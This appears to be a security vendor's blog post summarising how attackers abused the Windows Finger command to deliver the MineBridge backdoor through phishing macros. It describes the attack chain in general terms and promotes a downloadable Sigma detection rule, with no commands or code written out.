Threat actors constantly search for new ways to circumvent Windows security restrictions and drop malware onto the targeted network. Native Windows executables, known as LoLbins, are frequently being misused for this purpose. Recently, the Windows Finger feature was added to this list since hackers abused it for MineBridge backdoor delivery.
The Finger feature is a native Windows command used to reach information about remote systems users. However, security researchers identified a tricky method to convert Finger into a file loader and C&C server for data exfiltration. Specifically, the malicious commands might be masqueraded as Finger queries that retrieve files and dump data without alerting antivirus mechanisms. The key obstacle to mass exploitation is Finger protocol relying on port 79 that is typically blocked. Nevertheless, a privileged hacker might overcome the restrictions via Windows NetSh Portproxy port redirection for the TCP protocol. Although the proof-of-concept (PoC) exploits have been developed and published in September 2020, hackers exploited the Finger feature in the wild only in January 2021.
The first cyber-criminal operation identified to misuse the Windows Finger command was aimed at MineBridge backdoor delivery. This malware strain emerged at the beginning of 2020 and was actively used to target the US and South Korean financial institutions. The infection usually starts with a phishing email that has a malicious Word file attached. The document masquerades as a job application, and once opened, installs the backdoor via malicious macros.
The attack chain remains the same for the latest MineBridge campaign. However, in this case, macros execute a specific command that relies on Finger to launch a Base64 encoded malware loader. This loader drops TeamViewer on the infected device and applies DLL hijacking to install the MineBrige backdoor. Upon installation, the backdoor provides full remote access to the victim’s system, allowing hackers to install additional malware, execute arbitrary files, grab system information, and more.
To detect malicious activity associated with Windows Finger misuse, you can download a fresh Sigma rule from the SOC Prime team:
The rule has translations to the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, LogPoint, Humio, RSA NetWitness
EDR: Microsoft Defender ATP, Carbon Black
Tactics: Execution, Defense Evasion
Techniques: Signed Binary Proxy Execution (T1218)
In case you don’t have a paid access to the Threat Detection Marketplace, you might activate your free trial under a community subscription to unlock the Sigma rule related to the Windows Finger misuse prevention.
Sign up to the Threat Detection Marketplace for free and expand your threat detection capabilities by reaching new SOC content items released every day. Have a desire to create your own Sigma rules? Join our Threat Bounty community and contribute to threat hunting initiatives!